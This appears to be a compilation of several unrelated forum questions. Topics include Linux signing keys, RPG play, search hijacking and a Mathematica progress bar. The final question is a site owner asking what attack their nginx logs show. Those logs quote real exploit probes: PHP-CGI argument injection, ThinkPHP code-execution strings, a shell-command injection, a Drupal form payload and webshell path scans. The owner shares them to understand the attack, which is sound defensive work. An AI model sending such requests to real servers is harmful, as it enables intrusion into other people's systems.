seems like a wide gaping hole in the process for checking integrity of e.g. linux distro releases

Many linux distributions recommend using downloaded signing keys to verify the integrity of downloaded checksums. This seems utterly ridiculous to me, since the downloaded keys are just as suspect as the downloaded checksums. And checking key fingerprints is exactly the same thing, ie the page with the fingerprints is just another file downloaded by my browser.

Example: https://getfedora.org/en/security/

If I trust the PKI of my browser (assuming https) to authenticate the key or key fingerprints, then I dont need the signing process in the first place. But of course I DONT trust the PKI because the list of root certs distributed with major OS’s is chocked full of very very dodgy CAs.

At minimum, shouldn’t the keys of a new release be signed with the keys of the previous release? That way you can maintain a chain of integrity.

Given that the same process is used for GPG: https://gnupg.org/signature_key.html I assume I am being a moron and missing something obvious. Can anyone explain?

How can I handle a player who seems to utilize skills their characters don’t have?

Well the tag is slightly misleading as these players do not cause problems. However I have encountered several players who exhibit skills their real life counterpart has without actually metagaming. As an example I encountered a player while running storyteller system and while they didn’t have leadership skill they were quite fond of management stuff and assigned people that were under their command. On a similar note I had a player in D&D 5e who did not have survival proficiency (or nature proficiency for that matter) but he explained how his character set up a rudimentary water purification system.

I thought of a few solutions for this.

  1. Just tell them no. While this solution feels like the correct one my players often get excited when they utilize things like this and I don’t want to be the GM that says ‘No fun allowed’.

  2. Ask them to switch their proficiencies/skills to better reflect their knowledge. This feels a bit too punishing and I feel that it might end up causing them to not have the character they had in mind.

  3. Just let it fly. This is what I have been doing so far but to be honest I feel it is hurting other players and stealing the spotlight from people that invested in the required skills.

The main question is: How can I handle a player who seems to utilize skills their characters don’t have?

google seems not to be the real google

I have a problem with google searches that occasionally point me to sites containing only nonsense. The nasty thing is, it happens only occasionally, like every hour or so of browsing which made me believe several times I solved the issue. A redirection of the link always happens but this is not the problem. The link displayed is already doggy and if I type in the found url directly in the browser, I always get "No Permission". If the response is an URL that i happen to know, then I am always redirected to the correct site.

The problem started during the weekend on my computer and that of my wife and for every browser, Firefox, Chrome, Edge. Mobiles are not affected though. I run Linux (Tumbleweed) and my wife Windows 10.

So I thought it must be my router, ASUS ac68u. Hence I factory reseted it, changed the password and installed the newest firmware (well, it did it automatically). But the problem persisted.

I ran a virus scanner on my wife’s Windows 10 and it found nothing. I also set another DNS server on all machines, 8.8.8.8, the only DNS address I remembered from ancient times. But also no luck.

My conclusion is that only google queries are affected (no problem with duckduckgo). But that is not plausible, because the SSH keys would also ad to be faked by the attacker. My browser says it’s google when right clicking on the lock.

I really do not know where to look further. Next thing I will probably do is install a fresh OS, which is easy enough on Linux, but on Windows this will be a lot more work.

BTW, everything I install in Linux is from the package manager. I have compiled a few projects from github though.

The first dodgy site I saw was the infamous "You won a price" scam. But all security sites say it is a browser hack. I cannot imagine five browsers have been hacked at the same time on two different operating systems.

Any idea?

ProgressIndicator with Monitor seems to update to 0 and then back to correct number

I am monitoring a large function that reads in filenames, performs operations and saves multiple files to different folders. This works without issue, but I like to be able to monitor in case it stalls at a certain file so that I can check if something is wrong.

Monitor[  Table[myfun[filename[[n]]], {n, 1,     numfiles}],  Row[{ProgressIndicator[n, {1, numfiles}],     ToString[N[100 (n - 1)/numfiles]] <> "%"}, " "]] 

For the most part, the progress bar works correctly, but when it initially moves to a new file the n% and progress bar resets to 0%, before getting back to the correct % complete and process. Is there something wrong with how I have used these functions? Thanks.

if campain seems like ending should i change character

I feel like it might be ending because, one of the other players are in jail with no chance of escape, and another was currently kicked from the only home she ever new and is feeling depressed, while another is at deaths door and I’m stuck in the middle. so which one should I do: quit and make a new character or should I try to see some good in all of this and try to help all of them at once? if so, how should I go around it, I have no Idea on how to keep my team together.

There seems to have been an attempt to attack my website

I am using PHP as a server side language. And I don’t use CMS or Framework. From the nginx log the website attack seems obvious.

I wonder what kind of attack the attacker attempted.

The attacker sent 941 malicious queries over a period of about 5 minutes, some of which are listed below.

— Nginx Log 1 —

[23/Mar/2020:03:24:02 +0000] "POST /Admin06f42d34/Login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:03 +0000] "GET /l.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" "218.75.30.86" [23/Mar/2020:03:24:04 +0000] "GET /phpinfo.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" "218.75.30.86" [23/Mar/2020:03:24:05 +0000] "GET /test.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" "218.75.30.86" [23/Mar/2020:03:24:06 +0000] "POST /index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86" [23/Mar/2020:03:24:06 +0000] "POST /bbs.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86" [23/Mar/2020:03:24:06 +0000] "POST /forum.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86" [23/Mar/2020:03:24:07 +0000] "POST /forums.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86" [23/Mar/2020:03:24:08 +0000] "POST /bbs/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86" [23/Mar/2020:03:24:08 +0000] "POST /forum/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86" [23/Mar/2020:03:24:08 +0000] "POST /forums/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86" [23/Mar/2020:03:24:09 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "218.75.30.86" [23/Mar/2020:03:24:09 +0000] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "218.75.30.86" [23/Mar/2020:03:24:11 +0000] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "218.75.30.86" [23/Mar/2020:03:24:20 +0000] "POST /%62%61%73%65/%70%6F%73%74%2E%70%68%70 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0" "218.75.30.86" [23/Mar/2020:03:24:20 +0000] "GET /webdav/ HTTP/1.1" 301 178 "-" "Mozilla/5.0" "218.75.30.86" [23/Mar/2020:03:24:21 +0000] "GET /%69%73%70%69%72%69%74/%69%6D/%75%70%6C%6F%61%64%2E%70%68%70 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:21 +0000] "GET /help.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:22 +0000] "GET /java.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:22 +0000] "GET /_query.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:23 +0000] "GET /test.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:23 +0000] "GET /db_cts.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:23 +0000] "GET /db_pma.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:24 +0000] "GET /logon.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:24 +0000] "GET /help-e.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:24 +0000] "GET /license.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:24 +0000] "GET /log.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:25 +0000] "GET /hell.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:25 +0000] "GET /pmd_online.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:25 +0000] "GET /x.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:26 +0000] "GET /shell.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:26 +0000] "GET /htdocs.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:27 +0000] "GET /b.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:27 +0000] "GET /sane.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:28 +0000] "GET /desktop.ini.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:28 +0000] "GET /z.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:28 +0000] "GET /lala.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:29 +0000] "GET /lala-dpr.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" 

— Nginx Log 2 —

[23/Mar/2020:03:24:37 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:38 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:38 +0000] "GET /scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:39 +0000] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:39 +0000] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:39 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:39 +0000] "GET /PMA/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:40 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:40 +0000] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" 

— Nginx Log 3 —

[23/Mar/2020:03:24:41 +0000] "GET /myadmin/scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:41 +0000] "GET /MyAdmin/scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:42 +0000] "GET /plugins/weathermap/editor.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:42 +0000] "GET /cacti/plugins/weathermap/editor.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:42 +0000] "GET /weathermap/editor.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:43 +0000] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:43 +0000] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:43 +0000] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:43 +0000] "GET /index.php/module/action/param1/$  {@die(md5(HelloThinkPHP))} HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:44 +0000] "GET /index.php?s=/module/action/param1/$  {@die(md5(HelloThinkPHP))} HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:44 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:44 +0000] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:45 +0000] "GET /joomla/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:45 +0000] "GET /Joomla/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:45 +0000] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:45 +0000] "GET /d7.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:46 +0000] "GET /rxr.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:46 +0000] "GET /1x.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:24:46 +0000] "GET /home.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" 

— Nginx Log 4 —

[23/Mar/2020:03:29:06 +0000] "POST /wp-includes/css/modules.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:06 +0000] "POST /wp-includes/css/wp-config.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:06 +0000] "POST /wp-includes/css/wp-login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:07 +0000] "POST /wp-includes/fonts/modules.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:07 +0000] "POST /wp-includes/fonts/wp-config.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:07 +0000] "POST /wp-includes/fonts/wp-login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:07 +0000] "POST /wp-includes/modules/modules.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:08 +0000] "POST /wp-includes/modules/wp-config.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:08 +0000] "POST /wp-includes/modules/wp-login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:08 +0000] "POST /shell.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:09 +0000] "POST /data/admin/help.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:09 +0000] "POST /12.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:10 +0000] "POST /ecmsmod.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:10 +0000] "GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" "218.75.30.86" [23/Mar/2020:03:29:10 +0000] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" "218.75.30.86" [23/Mar/2020:03:29:10 +0000] "GET /weaver/bsh.servlet.BshServlet HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" "218.75.30.86" [23/Mar/2020:03:29:11 +0000] "GET /solr/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" "218.75.30.86" [23/Mar/2020:03:29:12 +0000] "POST /index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" "218.75.30.86" [23/Mar/2020:03:29:12 +0000] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" "218.75.30.86" [23/Mar/2020:03:29:12 +0000] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" 